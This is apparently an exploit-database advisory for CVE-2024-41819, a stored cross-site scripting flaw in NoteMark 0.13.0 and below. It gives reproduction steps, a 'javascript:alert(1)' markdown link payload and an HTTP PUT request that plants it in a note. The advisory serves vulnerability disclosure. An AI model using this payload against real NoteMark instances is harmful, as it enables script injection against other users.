Headline
Notemark 0.13.0 Cross Site Scripting
Notemark versions 0.13.0 and below suffer from a cross site scripting vulnerability.
# Exploit Title: Stored XSS in NoteMark# Date: 07/29/2024# Exploit Author: Alessio Romano (sfoffo)# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/# Version: 0.13.0 and below# Tested on: Linux# References:https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3# CVE: CVE-2024-41819## Steps to Reproduce1. Log in to the application.2. Create a new note or enter a previously created note.3. Access the note editor functionality from the selected note by clickingon the "Editor" tab.4. Input the following payload:[xss-link](javascript:alert(1))5. Save the changes.6. Click on the "Rendered" tab to view the rendered markdown version of thenote. Click on the previously created link to pop the injected alert.## HTTP Request PoCPUT /api/notes/<note-uuid>/content HTTP/1.1Host: localhost:8000Accept: */*Content-Type: text/plain;charset=UTF-8Content-Length: 34Sec-Fetch-Site: same-originAuthorization: Bearer <TOKEN>[xss-link](javascript:alert(1))